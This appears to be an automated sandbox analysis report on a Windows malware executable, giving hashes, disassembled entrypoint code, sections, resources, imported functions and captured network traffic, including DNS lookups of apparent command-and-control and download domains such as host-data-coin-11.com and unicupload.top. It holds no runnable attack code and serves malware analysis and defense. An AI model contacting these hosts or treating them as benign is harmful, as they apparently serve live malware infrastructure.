                                                                                                                                                    SHA1:f87c7511d2c4ea4894603d3cfddd478c8c2b3ead
                                                                                                                                                    SHA256:c8fe81088b2caa9df35d92a588fb266a145c95b81b5c66d5bfe181fa73b17d82
                                                                                                                                                    SHA512:71230365c1e7acb2b8740434322a1f8aa87d417eadbb6d8d7fb1b2bf9ecb1247bfec2b2568812f22d61f125b3f4f739989121b5e17c63ccd580d8e8b059c63c0
                                                                                                                                                    SSDEEP:6144:dTIJAM3EC/eddUaHyF9mqcMuS9W1uPVeHcENjQe:dY3EIWU9/pcO9rPVeqe
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R.....g.R..])...R...S...R.......R.......R.......R.Rich..R.................PE..L.....-`...................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:c8d0d8e0f8e0f4e0

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x41b3e0
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                    Time Stamp:0x602DA0A7 [Wed Feb 17 23:03:03 2021 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:5
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:5
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:80fec6fca6f81033220e34b44810dbfd

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    mov edi, edi
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    call 00007F75E8BF25EBh
                                                                                                                                                    call 00007F75E8BE55F6h
                                                                                                                                                    pop ebp
                                                                                                                                                    ret
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    int3
                                                                                                                                                    mov edi, edi
                                                                                                                                                    push ebp
                                                                                                                                                    mov ebp, esp
                                                                                                                                                    push FFFFFFFEh
                                                                                                                                                    push 0043D9D8h
                                                                                                                                                    push 0041E5C0h
                                                                                                                                                    mov eax, dword ptr fs:[00000000h]
                                                                                                                                                    push eax
                                                                                                                                                    add esp, FFFFFF94h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    mov eax, dword ptr [00440354h]
                                                                                                                                                    xor dword ptr [ebp-08h], eax
                                                                                                                                                    xor eax, ebp
                                                                                                                                                    push eax
                                                                                                                                                    lea eax, dword ptr [ebp-10h]
                                                                                                                                                    mov dword ptr fs:[00000000h], eax
                                                                                                                                                    mov dword ptr [ebp-18h], esp
                                                                                                                                                    mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                    lea eax, dword ptr [ebp-60h]
                                                                                                                                                    push eax
                                                                                                                                                    call dword ptr [004010A0h]
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    jmp 00007F75E8BE5608h
                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                    ret
                                                                                                                                                    mov esp, dword ptr [ebp-18h]
                                                                                                                                                    mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    mov eax, dword ptr [ebp-78h]
                                                                                                                                                    jmp 00007F75E8BE5737h
                                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                    call 00007F75E8BE5774h
                                                                                                                                                    mov dword ptr [ebp-6Ch], eax
                                                                                                                                                    push 00000001h
                                                                                                                                                    call 00007F75E8BF2FCAh
                                                                                                                                                    add esp, 04h
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007F75E8BE55ECh
                                                                                                                                                    push 0000001Ch
                                                                                                                                                    call 00007F75E8BE572Ch
                                                                                                                                                    add esp, 04h
                                                                                                                                                    call 00007F75E8BEE6D4h
                                                                                                                                                    test eax, eax
                                                                                                                                                    jne 00007F75E8BE55ECh
                                                                                                                                                    push 00000010h

                                                                                                                                                    Rich Headers

                                                                                                                                                    Programming Language:
                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                    • [C++] VS2008 build 21022

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3e1040x28.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1600000x83b8.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1690000x1df4.reloc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x13900x1c.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91300x40.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x344.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x3e4740x3e600False0.581001847445data6.95435391538IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x400000x11c9880x1800False0.33984375data3.45568717424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .zug0x15d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .nafuti0x15e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .karom0x15f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x1600000x83b80x8400False0.597064393939data5.82148733152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                    .reloc0x1690000x46fa0x4800False0.347493489583data3.69367482599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                    AFX_DIALOG_LAYOUT0x166ce80x2dataDutchNetherlands
                                                                                                                                                    AFX_DIALOG_LAYOUT0x166ce00x2dataDutchNetherlands
                                                                                                                                                    AFX_DIALOG_LAYOUT0x166cf00x2dataDutchNetherlands
                                                                                                                                                    AFX_DIALOG_LAYOUT0x166cf80x2dataDutchNetherlands
                                                                                                                                                    CIDAFICUDUROSOTAROM0x1665c80x6c7ASCII text, with very long lines, with no line terminatorsSpanishColombia
                                                                                                                                                    RT_CURSOR0x166d000x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                                                                    RT_ICON0x1606e00x6c8dataSpanishColombia
                                                                                                                                                    RT_ICON0x160da80x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                    RT_ICON0x1613100x10a8dataSpanishColombia
                                                                                                                                                    RT_ICON0x1623b80x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                                                                                    RT_ICON0x162d400x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                    RT_ICON0x1631f80x8a8dataSpanishColombia
                                                                                                                                                    RT_ICON0x163aa00x6c8dataSpanishColombia
                                                                                                                                                    RT_ICON0x1641680x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                    RT_ICON0x1646d00x10a8dataSpanishColombia
                                                                                                                                                    RT_ICON0x1657780x988dataSpanishColombia
                                                                                                                                                    RT_ICON0x1661000x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                    RT_STRING0x1675c00xe4dataDutchNetherlands
                                                                                                                                                    RT_STRING0x1676a80x3a8dataDutchNetherlands
                                                                                                                                                    RT_STRING0x167a500x6e6dataDutchNetherlands
                                                                                                                                                    RT_STRING0x1681380x1a0dataDutchNetherlands
                                                                                                                                                    RT_STRING0x1682d80xdcdataDutchNetherlands
                                                                                                                                                    RT_ACCELERATOR0x166ca00x10dataDutchNetherlands
                                                                                                                                                    RT_ACCELERATOR0x166c900x10dataDutchNetherlands
                                                                                                                                                    RT_GROUP_CURSOR0x1675a80x14dataDutchNetherlands
                                                                                                                                                    RT_GROUP_ICON0x1631a80x4cdataSpanishColombia
                                                                                                                                                    RT_GROUP_ICON0x1665680x5adataSpanishColombia
                                                                                                                                                    None0x166cc00xadataDutchNetherlands
                                                                                                                                                    None0x166cd00xadataDutchNetherlands
                                                                                                                                                    None0x166cb00xadataDutchNetherlands

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    KERNEL32.dllCallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthW, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeW, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, GetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, GetConsoleCursorInfo, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetDriveTypeA, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, GetConsoleMode, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBA, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetNumberOfConsoleInputEvents, GetModuleHandleW, WriteConsoleOutputCharacterA, HeapFree, OpenMutexW, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetProcessVersion, lstrcpynA, GetNamedPipeInfo, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    DutchNetherlands
                                                                                                                                                    SpanishColombia

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 14, 2022 10:43:44.925784111 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:44.943053007 CET80496898.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:44.943180084 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:44.943408012 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:44.943439007 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:44.960557938 CET80496898.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.063524008 CET80496898.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.063720942 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.064712048 CET4968980192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.081921101 CET80496898.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.097636938 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.115295887 CET80496908.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.115485907 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.115626097 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.115641117 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.132796049 CET80496908.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.236871004 CET80496908.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.237093925 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.237128019 CET4969080192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.254343987 CET80496908.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.590917110 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608295918 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.608402014 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608616114 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.608633995 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.625770092 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731518030 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731544971 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:45.731698990 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.732026100 CET4969180192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:45.749219894 CET80496918.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.032267094 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049676895 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.049788952 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049937963 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.049968958 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.067193985 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.172333002 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.172442913 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.172768116 CET4969280192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.190078020 CET80496928.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.205656052 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223099947 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.223211050 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223444939 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.223491907 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.240705013 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353874922 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353909969 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.353992939 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.354624033 CET4969380192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.371857882 CET80496938.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.677557945 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697048903 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.697189093 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697333097 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.697365999 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.716557980 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817501068 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817846060 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.817981005 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.818010092 CET4969480192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:46.828490019 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:46.835369110 CET80496948.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:46.884790897 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:47.397871971 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:47.454294920 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:47.960551977 CET4969580192.168.2.6185.186.142.166
                                                                                                                                                    Jan 14, 2022 10:43:48.016925097 CET8049695185.186.142.166192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.049243927 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066534042 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.066698074 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066840887 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.066869020 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.084045887 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.186916113 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.187083006 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.187431097 CET4969680192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.204561949 CET80496968.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.216995001 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234241962 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.234390974 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234538078 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.234564066 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.251703978 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.379425049 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.379535913 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.379848957 CET4969780192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.396939039 CET80496978.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.704284906 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.721527100 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.721633911 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.721760988 CET4969880192.168.2.68.209.70.0
                                                                                                                                                    Jan 14, 2022 10:43:48.780425072 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823457003 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823493004 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823517084 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823540926 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823563099 CET80496988.209.70.0192.168.2.6
                                                                                                                                                    Jan 14, 2022 10:43:48.823586941 CET80496988.209.70.0192.168.2.6

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jan 14, 2022 10:43:44.633687973 CET192.168.2.68.8.8.80x8523Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:45.077446938 CET192.168.2.68.8.8.80x6b8bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:45.249844074 CET192.168.2.68.8.8.80xb24dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:45.744626045 CET192.168.2.68.8.8.80x7fc2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:46.185400963 CET192.168.2.68.8.8.80x1213Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:46.366353035 CET192.168.2.68.8.8.80x7ee1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.028930902 CET192.168.2.68.8.8.80xf8eaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.198477983 CET192.168.2.68.8.8.80xfb93Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:48.390367031 CET192.168.2.68.8.8.80x1b5eStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:50.684801102 CET192.168.2.68.8.8.80xc627Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:50.858036041 CET192.168.2.68.8.8.80x27bdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.026129961 CET192.168.2.68.8.8.80x4517Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.332477093 CET192.168.2.68.8.8.80x1fe2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.513241053 CET192.168.2.68.8.8.80x2f07Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.683567047 CET192.168.2.68.8.8.80xc35cStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:51.847625017 CET192.168.2.68.8.8.80x34a3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.016745090 CET192.168.2.68.8.8.80xad87Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.187030077 CET192.168.2.68.8.8.80x9243Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.367851019 CET192.168.2.68.8.8.80xbcdbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:52.539206982 CET192.168.2.68.8.8.80x6463Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.230817080 CET192.168.2.68.8.8.80x3b21Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.404676914 CET192.168.2.68.8.8.80x5292Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.578222036 CET192.168.2.68.8.8.80x6dbaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:54.775106907 CET192.168.2.68.8.8.80xfaf6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:58.634373903 CET192.168.2.68.8.8.80xcd6cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:58.833694935 CET192.168.2.68.8.8.80x9e96Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.021801949 CET192.168.2.68.8.8.80xfa32Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:43:59.187329054 CET192.168.2.68.8.8.80x4146Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:44:01.036515951 CET192.168.2.68.8.8.80x798dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
